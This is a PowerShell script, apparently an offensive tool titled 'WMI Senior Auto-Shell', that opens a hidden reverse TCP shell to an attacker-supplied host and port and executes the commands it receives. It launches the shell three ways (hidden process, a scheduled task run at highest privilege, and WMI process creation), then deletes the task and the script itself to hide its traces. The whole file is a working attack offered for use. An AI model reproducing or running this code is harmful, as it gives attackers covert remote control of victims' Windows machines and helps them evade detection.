# FIXED WMI SENIOR AUTO-SHELL v3.1 - Parse Error Corrected
# Single-click -> Instant shell to

$LHOST = ""
$LPORT = 

# METHOD 1: Direct TCP Shell (No quoting hell)
$DirectShell = "powershell.exe -nop -w hidden -c `" `$c=New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT);`$s=`$c.GetStream();[byte[]]`$b=0..65535|%{0};while((`$i=`$s.Read(`$b,0,`$b.Length))-ne0){`$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$b,0,`$i);`$o=(iex `$d 2>&1|Out-String);`$ob=[text.encoding]::ASCII.GetBytes(`$o+'PS '+(pwd)+'>');`$s.Write(`$ob,0,`$ob.Length);`$s.Flush()};`$c.Close() `""

# EXECUTE DIRECT (Highest success rate)
Start-Process -WindowStyle Hidden -FilePath "cmd.exe" -ArgumentList "/c", $DirectShell

# METHOD 2: SCHTASKS (SYSTEM fallback)
$schtasksCmd = "schtasks /create /tn `"_SYSUP`" /tr `"$DirectShell`" /sc once /st 00:00 /f /rl highest"
cmd.exe /c $schtasksCmd | Out-Null

# METHOD 3: WMI Process (Admin bypass)
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $DirectShell | Out-Null

# CLEANUP
Start-Sleep 2
schtasks /delete /tn "_SYSUP" /f | Out-Null

Write-Host "[+] Shell Deployed -> $LHOST`:$LPORT (3x Methods)" -ForegroundColor Green

# Self-delete
Remove-Item $MyInvocation.MyCommand.Definition -Force -ErrorAction SilentlyContinue